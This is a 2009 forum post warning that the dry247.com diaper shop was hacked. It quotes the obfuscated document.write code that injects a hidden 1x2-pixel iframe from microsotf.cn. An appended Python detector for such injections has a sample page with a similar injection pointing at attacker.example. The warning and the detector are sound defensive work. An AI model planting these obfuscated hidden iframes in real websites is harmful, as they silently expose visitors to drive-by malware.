Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.
Code:
document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');

That's a quick snippet from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a Chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a typo), but it's possible that their server is infected and intercepting credit card data as well.
I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com
Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use Firefox and the NoScript add-on and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copied & pasted from their website):
1425 37th street
Brooklyn, NY, 11218
This makes me sad, since they make my favorite diaper and I was going to buy a case. I can wait a couple days while they clear this up, though.
Thanks to Technologic:
Google Safe Browsing diagnostic page for www.dry247.com <- a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place; thanks for catching it, Technologic.
I've sent an email to them just to make sure they know.
**EDIT, Jul 28th 2009**
Their site is still down, no update as of yet as to when it will be back up. Why is it so few companies ever consider security or disaster recovery until it's too late?
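
As an added example (not part of the original post): a static check a site owner could run over saved page source to catch this kind of injection. It folds `document.write` string-concatenation chains without executing them and flags iframes only a few pixels in size. The sample page, the `attacker.example` host and the 5-pixel threshold are constructed assumptions.

```python
import re
from html.parser import HTMLParser

MAX_PX = 5  # assumption: a frame this small in either dimension is effectively invisible
WRITE = re.compile(r'document\.write(?:ln)?\s*\(')
LITERAL = re.compile(r'\s*(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')')
PLUS, CLOSE = re.compile(r'\s*\+'), re.compile(r'\s*\)')

def fold_write_args(js):
    """Yield the joined string for each document.write() whose argument is only literals."""
    for call in WRITE.finditer(js):
        pos, parts = call.end(), []
        while True:
            lit = LITERAL.match(js, pos)
            if not lit:          # a variable or expression: cannot be folded statically
                break
            body = lit.group(1) if lit.group(1) is not None else lit.group(2)
            parts.append(re.sub(r'\\(.)', r'\1', body))  # drop backslash escapes like \"
            pos = lit.end()
            plus = PLUS.match(js, pos)
            if not plus:
                if CLOSE.match(js, pos):
                    yield "".join(parts)
                break
            pos = plus.end()

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))

def tiny(value):
    m = re.fullmatch(r'\s*(\d+)\s*(?:px)?\s*', value or "")
    return bool(m) and int(m.group(1)) <= MAX_PX

def find_hidden_iframes(page_source):
    """Return tiny iframes found in the markup or in folded document.write() output."""
    sources = [("markup", page_source)]
    sources += [("document.write", s) for s in fold_write_args(page_source)]
    hits = []
    for via, html in sources:
        finder = IframeFinder()
        finder.feed(html)
        finder.close()
        hits += [{"via": via, "src": a.get("src")} for a in finder.frames
                 if tiny(a.get("width")) or tiny(a.get("height"))]
    return hits

# Constructed sample page: one normal iframe, one split-string injection, one harmless write.
SAMPLE = r'''<html><body><iframe src="https://maps.example/embed" width="600" height="400"></iframe>
<script>document.write("<if"+''+'ra'+"me s"+'rc=\"ht'+"tp://attacker.example/\" wid"+'th=1 hei'+"ght=2></if"+''+"rame>");</script>
<script>document.write("<p>" + userName + "</p>");</script></body></html>'''
```

A hit reported with `via` set to `document.write` is worth treating as an incident on its own, since legitimate code rarely splits a tag name across string literals.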